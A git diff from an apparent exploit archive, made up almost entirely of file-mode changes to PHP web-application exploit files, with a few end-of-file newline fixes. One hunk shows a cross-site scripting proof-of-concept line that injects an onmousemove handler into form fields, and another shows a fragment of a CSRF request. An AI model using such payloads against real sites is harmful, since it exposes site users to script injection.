b/platforms/php/webapps/39416.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39420.txt b/platforms/php/webapps/39420.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39423.txt b/platforms/php/webapps/39423.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39427.txt b/platforms/php/webapps/39427.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39436.txt b/platforms/php/webapps/39436.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3944.txt b/platforms/php/webapps/3944.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39448.txt b/platforms/php/webapps/39448.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39451.txt b/platforms/php/webapps/39451.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39453.txt b/platforms/php/webapps/39453.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39458.txt b/platforms/php/webapps/39458.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39459.txt b/platforms/php/webapps/39459.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3946.txt b/platforms/php/webapps/3946.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39468.txt b/platforms/php/webapps/39468.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39469.txt b/platforms/php/webapps/39469.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3947.txt b/platforms/php/webapps/3947.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39473.txt b/platforms/php/webapps/39473.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39474.txt b/platforms/php/webapps/39474.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39478.txt b/platforms/php/webapps/39478.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3948.txt b/platforms/php/webapps/3948.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3949.txt b/platforms/php/webapps/3949.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39498.txt b/platforms/php/webapps/39498.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39501.txt b/platforms/php/webapps/39501.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39506.txt b/platforms/php/webapps/39506.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39507.txt b/platforms/php/webapps/39507.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39513.txt b/platforms/php/webapps/39513.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39521.txt b/platforms/php/webapps/39521.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39524.js b/platforms/php/webapps/39524.js old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3953.txt b/platforms/php/webapps/3953.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39534.html b/platforms/php/webapps/39534.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39536.txt b/platforms/php/webapps/39536.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39547.txt b/platforms/php/webapps/39547.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39548.txt b/platforms/php/webapps/39548.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39552.txt b/platforms/php/webapps/39552.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39553.txt b/platforms/php/webapps/39553.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39558.txt b/platforms/php/webapps/39558.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39559.txt b/platforms/php/webapps/39559.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3956.php b/platforms/php/webapps/3956.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39563.txt b/platforms/php/webapps/39563.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39567.txt b/platforms/php/webapps/39567.txt old mode 100755 new mode 100644 index 0d1afc988..9397c87bd --- a/platforms/php/webapps/39567.txt +++ b/platforms/php/webapps/39567.txt @@ -130,4 +130,4 @@ csrf=685bba70d144b8b8727937b56f5b87e669135fe1&user_id=8&login=user&firstname=%22 3.Solution -No newer (fixed) versions are currently available. \ No newline at end of file +No newer (fixed) versions are currently available. \ No newline at end of file diff --git a/platforms/php/webapps/3957.php b/platforms/php/webapps/3957.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39571.txt b/platforms/php/webapps/39571.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39572.txt b/platforms/php/webapps/39572.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39575.txt b/platforms/php/webapps/39575.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39576.txt b/platforms/php/webapps/39576.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39577.txt b/platforms/php/webapps/39577.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3958.php b/platforms/php/webapps/3958.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39580.txt b/platforms/php/webapps/39580.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39582.txt b/platforms/php/webapps/39582.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39583.txt b/platforms/php/webapps/39583.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39584.txt b/platforms/php/webapps/39584.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39586.txt b/platforms/php/webapps/39586.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39587.txt b/platforms/php/webapps/39587.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39588.txt b/platforms/php/webapps/39588.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39589.txt b/platforms/php/webapps/39589.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3959.php b/platforms/php/webapps/3959.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39590.txt b/platforms/php/webapps/39590.txt old mode 100755 new mode 100644 index b8250d1fe..91d95fb46 --- a/platforms/php/webapps/39590.txt +++ b/platforms/php/webapps/39590.txt @@ -18,4 +18,4 @@ # T3NZOG4N (t3nz0g4n@yahoo.com) # Homepage : persian-team.ir # Greetz : Milad_Hacking & FireKernel And You -###################### \ No newline at end of file +###################### \ No newline at end of file diff --git a/platforms/php/webapps/39591.txt b/platforms/php/webapps/39591.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39592.txt b/platforms/php/webapps/39592.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39593.txt b/platforms/php/webapps/39593.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3960.php b/platforms/php/webapps/3960.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3962.txt b/platforms/php/webapps/3962.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39621.txt b/platforms/php/webapps/39621.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39623.txt b/platforms/php/webapps/39623.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3963.txt b/platforms/php/webapps/3963.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39637.txt b/platforms/php/webapps/39637.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3964.txt b/platforms/php/webapps/3964.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39668.txt b/platforms/php/webapps/39668.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39676.txt b/platforms/php/webapps/39676.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39678.txt b/platforms/php/webapps/39678.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39679.txt b/platforms/php/webapps/39679.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39682.txt b/platforms/php/webapps/39682.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39688.txt b/platforms/php/webapps/39688.txt old mode 100755 new mode 100644 index 3cb2f95e6..d26bdac4a --- a/platforms/php/webapps/39688.txt +++ b/platforms/php/webapps/39688.txt @@ -21,4 +21,4 @@ The problem: The GLOBALS[babInstallPath]-parameter isn't declared before require Declare this parameter or use an alert! -Greetings from bd0rk. HackThePlanet! \ No newline at end of file +Greetings from bd0rk. HackThePlanet! \ No newline at end of file diff --git a/platforms/php/webapps/39695.txt b/platforms/php/webapps/39695.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39697.txt b/platforms/php/webapps/39697.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3970.txt b/platforms/php/webapps/3970.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39704.txt b/platforms/php/webapps/39704.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39705.txt b/platforms/php/webapps/39705.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39707.txt b/platforms/php/webapps/39707.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39709.txt b/platforms/php/webapps/39709.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3971.php b/platforms/php/webapps/3971.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39710.txt b/platforms/php/webapps/39710.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39711.php b/platforms/php/webapps/39711.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39714.txt b/platforms/php/webapps/39714.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3972.txt b/platforms/php/webapps/3972.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39737.txt b/platforms/php/webapps/39737.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39744.html b/platforms/php/webapps/39744.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39745.txt b/platforms/php/webapps/39745.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39751.txt b/platforms/php/webapps/39751.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39752.txt b/platforms/php/webapps/39752.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39759.txt b/platforms/php/webapps/39759.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39760.txt b/platforms/php/webapps/39760.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39761.txt b/platforms/php/webapps/39761.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39766.php b/platforms/php/webapps/39766.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39781.txt b/platforms/php/webapps/39781.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39784.txt b/platforms/php/webapps/39784.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39806.txt b/platforms/php/webapps/39806.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39807.txt b/platforms/php/webapps/39807.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3981.php b/platforms/php/webapps/3981.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39813.txt b/platforms/php/webapps/39813.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39816.php b/platforms/php/webapps/39816.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39817.php b/platforms/php/webapps/39817.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3983.txt b/platforms/php/webapps/3983.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39838.php b/platforms/php/webapps/39838.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39849.txt b/platforms/php/webapps/39849.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39855.txt b/platforms/php/webapps/39855.txt old mode 100755 new mode 100644 index 6befccaff..ba9c4eae0 --- a/platforms/php/webapps/39855.txt +++ b/platforms/php/webapps/39855.txt @@ -83,4 +83,4 @@ undefined http://localhost/USERS/index.php Parameters: title, html, headline, size, youtube_id, address, latitude, longitude, user_first_name, user_last_name, agency, user_phone, user_email, website (POST) -Payload: " onmousemove=alert(1) \ No newline at end of file +Payload: " onmousemove=alert(1) \ No newline at end of file diff --git a/platforms/php/webapps/39856.txt b/platforms/php/webapps/39856.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39864.txt b/platforms/php/webapps/39864.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39868.txt b/platforms/php/webapps/39868.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3987.txt b/platforms/php/webapps/3987.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39870.html b/platforms/php/webapps/39870.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39872.txt b/platforms/php/webapps/39872.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39876.txt b/platforms/php/webapps/39876.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39879.txt b/platforms/php/webapps/39879.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3988.php b/platforms/php/webapps/3988.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39881.txt b/platforms/php/webapps/39881.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39883.txt b/platforms/php/webapps/39883.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39884.html b/platforms/php/webapps/39884.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39889.html b/platforms/php/webapps/39889.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39890.txt b/platforms/php/webapps/39890.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39891.txt b/platforms/php/webapps/39891.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39892.php b/platforms/php/webapps/39892.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39893.php b/platforms/php/webapps/39893.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39894.php b/platforms/php/webapps/39894.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39895.php b/platforms/php/webapps/39895.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39896.txt b/platforms/php/webapps/39896.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39898.txt b/platforms/php/webapps/39898.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39899.txt b/platforms/php/webapps/39899.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3990.txt b/platforms/php/webapps/3990.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39905.txt b/platforms/php/webapps/39905.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3991.txt b/platforms/php/webapps/3991.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39911.html b/platforms/php/webapps/39911.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39912.html b/platforms/php/webapps/39912.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39913.txt b/platforms/php/webapps/39913.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3992.txt b/platforms/php/webapps/3992.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39931.txt b/platforms/php/webapps/39931.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39932.html b/platforms/php/webapps/39932.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39934.txt b/platforms/php/webapps/39934.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39935.txt b/platforms/php/webapps/39935.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39936.txt b/platforms/php/webapps/39936.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3994.txt b/platforms/php/webapps/3994.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39946.php b/platforms/php/webapps/39946.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39948.txt b/platforms/php/webapps/39948.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39949.html b/platforms/php/webapps/39949.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3995.txt b/platforms/php/webapps/3995.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39950.txt b/platforms/php/webapps/39950.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39952.txt b/platforms/php/webapps/39952.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39953.txt b/platforms/php/webapps/39953.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39955.txt b/platforms/php/webapps/39955.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39956.txt b/platforms/php/webapps/39956.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39963.txt b/platforms/php/webapps/39963.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39964.html b/platforms/php/webapps/39964.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39965.txt b/platforms/php/webapps/39965.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39969.php b/platforms/php/webapps/39969.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3997.txt b/platforms/php/webapps/3997.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39970.txt b/platforms/php/webapps/39970.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39971.php b/platforms/php/webapps/39971.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39972.txt b/platforms/php/webapps/39972.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39974.html b/platforms/php/webapps/39974.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39976.txt b/platforms/php/webapps/39976.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39977.txt b/platforms/php/webapps/39977.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39978.php b/platforms/php/webapps/39978.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3998.php b/platforms/php/webapps/3998.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39981.html b/platforms/php/webapps/39981.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39983.txt b/platforms/php/webapps/39983.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39987.html b/platforms/php/webapps/39987.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39988.html b/platforms/php/webapps/39988.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39989.txt b/platforms/php/webapps/39989.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3999.txt b/platforms/php/webapps/3999.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/39998.txt b/platforms/php/webapps/39998.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4000.txt b/platforms/php/webapps/4000.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40006.txt b/platforms/php/webapps/40006.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40008.txt b/platforms/php/webapps/40008.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40009.txt b/platforms/php/webapps/40009.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40010.html b/platforms/php/webapps/40010.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40011.txt b/platforms/php/webapps/40011.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40012.txt b/platforms/php/webapps/40012.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40013.txt b/platforms/php/webapps/40013.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40015.txt b/platforms/php/webapps/40015.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40019.txt b/platforms/php/webapps/40019.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40021.php b/platforms/php/webapps/40021.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40022.txt b/platforms/php/webapps/40022.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40024.txt b/platforms/php/webapps/40024.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40027.txt b/platforms/php/webapps/40027.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40028.txt b/platforms/php/webapps/40028.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4004.php b/platforms/php/webapps/4004.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40041.txt b/platforms/php/webapps/40041.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40042.php b/platforms/php/webapps/40042.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40045.txt b/platforms/php/webapps/40045.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40046.txt b/platforms/php/webapps/40046.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40047.txt b/platforms/php/webapps/40047.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4005.txt b/platforms/php/webapps/4005.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40051.txt b/platforms/php/webapps/40051.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40057.txt b/platforms/php/webapps/40057.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40058.txt b/platforms/php/webapps/40058.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40059.txt b/platforms/php/webapps/40059.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4006.php b/platforms/php/webapps/4006.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40062.txt b/platforms/php/webapps/40062.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40068.txt b/platforms/php/webapps/40068.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40070.txt b/platforms/php/webapps/40070.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40076.php b/platforms/php/webapps/40076.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40078.txt b/platforms/php/webapps/40078.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40080.txt b/platforms/php/webapps/40080.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40082.txt b/platforms/php/webapps/40082.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40083.txt b/platforms/php/webapps/40083.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40084.txt b/platforms/php/webapps/40084.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40092.txt b/platforms/php/webapps/40092.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40093.txt b/platforms/php/webapps/40093.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40111.txt b/platforms/php/webapps/40111.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40126.txt b/platforms/php/webapps/40126.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40127.txt b/platforms/php/webapps/40127.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40137.html b/platforms/php/webapps/40137.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40140.txt b/platforms/php/webapps/40140.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40150.txt b/platforms/php/webapps/40150.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40153.txt b/platforms/php/webapps/40153.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40154.txt b/platforms/php/webapps/40154.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40163.txt b/platforms/php/webapps/40163.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40174.txt b/platforms/php/webapps/40174.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40189.txt b/platforms/php/webapps/40189.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4019.php b/platforms/php/webapps/4019.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40190.txt b/platforms/php/webapps/40190.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40191.txt b/platforms/php/webapps/40191.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40193.txt b/platforms/php/webapps/40193.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4020.php b/platforms/php/webapps/4020.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40202.txt b/platforms/php/webapps/40202.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40204.txt b/platforms/php/webapps/40204.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40206.txt b/platforms/php/webapps/40206.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40210.html b/platforms/php/webapps/40210.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40211.txt b/platforms/php/webapps/40211.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40212.txt b/platforms/php/webapps/40212.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40214.txt b/platforms/php/webapps/40214.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40215.txt b/platforms/php/webapps/40215.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40218.txt b/platforms/php/webapps/40218.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4022.htm b/platforms/php/webapps/4022.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40220.txt b/platforms/php/webapps/40220.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40221.txt b/platforms/php/webapps/40221.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40227.txt b/platforms/php/webapps/40227.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40237.txt b/platforms/php/webapps/40237.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40247.txt b/platforms/php/webapps/40247.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40248.txt b/platforms/php/webapps/40248.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4025.php b/platforms/php/webapps/4025.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40250.txt b/platforms/php/webapps/40250.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40251.txt b/platforms/php/webapps/40251.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40252.txt b/platforms/php/webapps/40252.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4026.php b/platforms/php/webapps/4026.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40278.txt b/platforms/php/webapps/40278.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40285.txt b/platforms/php/webapps/40285.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40288.txt b/platforms/php/webapps/40288.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4029.php b/platforms/php/webapps/4029.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40290.txt b/platforms/php/webapps/40290.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40292.txt b/platforms/php/webapps/40292.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40293.txt b/platforms/php/webapps/40293.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40295.txt b/platforms/php/webapps/40295.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40296.txt b/platforms/php/webapps/40296.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4030.php b/platforms/php/webapps/4030.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40300.py b/platforms/php/webapps/40300.py index 92406ba77..049cbdf1b 100755 --- a/platforms/php/webapps/40300.py +++ b/platforms/php/webapps/40300.py @@ -55,5 +55,4 @@ for x in range(0, 300): print url sys.exit(0) -print "Sorry, I did not find anything" - \ No newline at end of file +print "Sorry, I did not find anything" \ No newline at end of file diff --git a/platforms/php/webapps/4031.txt b/platforms/php/webapps/4031.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40312.txt b/platforms/php/webapps/40312.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40333.txt b/platforms/php/webapps/40333.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40338.txt b/platforms/php/webapps/40338.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4034.txt b/platforms/php/webapps/4034.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40343.txt b/platforms/php/webapps/40343.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40345.txt b/platforms/php/webapps/40345.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4035.txt b/platforms/php/webapps/4035.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40351.txt b/platforms/php/webapps/40351.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4036.php b/platforms/php/webapps/4036.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40364.txt b/platforms/php/webapps/40364.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40366.txt b/platforms/php/webapps/40366.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40388.html b/platforms/php/webapps/40388.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4039.txt b/platforms/php/webapps/4039.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40390.php b/platforms/php/webapps/40390.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/40391.txt b/platforms/php/webapps/40391.txt old mode 100755 new mode 100644 index 43c71a603..8821416f1 --- a/platforms/php/webapps/40391.txt +++ b/platforms/php/webapps/40391.txt @@ -20,4 +20,4 @@ A .CSV with all orders will be downloaded ### FIX -The vendor fix this issue in 1.0.9 \ No newline at end of file +The vendor fix this issue in 1.0.9 \ No newline at end of file diff --git a/platforms/php/webapps/40395.txt b/platforms/php/webapps/40395.txt old mode 100755 new mode 100644 diff --git 